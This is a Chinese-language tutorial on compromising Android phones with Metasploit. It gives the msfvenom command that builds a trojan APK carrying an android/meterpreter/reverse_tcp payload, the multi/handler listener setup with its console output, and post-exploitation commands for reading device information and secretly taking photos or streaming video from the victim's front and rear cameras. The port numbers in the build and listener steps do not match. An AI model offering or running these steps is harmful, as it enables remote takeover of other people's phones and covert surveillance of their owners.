Msf渗透安卓客户端

环境:kali Linux

开启msf: msfconsole

生成apk木马:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.192 LPORT=5555 R > /root/test.apk

'''
root@kali:~# msfconsole

msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description


Payload options (android/meterpreter/reverse_tcp):

Name Current Setting Required Description


LHOST yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name


0 Wildcard Target

msf exploit(handler) > set LHOST 192.168.1.192
LHOST => 192.168.1.192
msf exploit(handler) > set LPORT 55555
LPORT => 55555
msf exploit(handler) > exploit

[] Started reverse TCP handler on 192.168.1.192:55555
[
] Starting the payload handler...


command:
msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

show options

set LHOST 192.168.1.192#本机ip

set LPORT 55555#监听端口

exploit #开始利用接收会话

我们可以在我们的MSF里看见有一个会话连接了

Msf渗透安卓客户端_第1张图片
image

这样对方的手机就就被我们控制了,查看手机系统信息,输入命令 sysinfo

Msf渗透安卓客户端_第2张图片
image
image

webcam_list查看手机摄影头有几个 这里显示两项 分别表示有前后两个摄像头

Msf渗透安卓客户端_第3张图片
image

webcam_snap 隐秘拍照功能

后边跟上参数-i 指定使用那个摄像头拍照

可以看见我们分别对前后摄像头都拍了照 保存到了桌面上

还可以输入命令 webcam_stream 开启摄像头

总结:
1.用msf生成apk木马
2.配置并开启监听接收会话

你可能感兴趣的:(Msf渗透安卓客户端)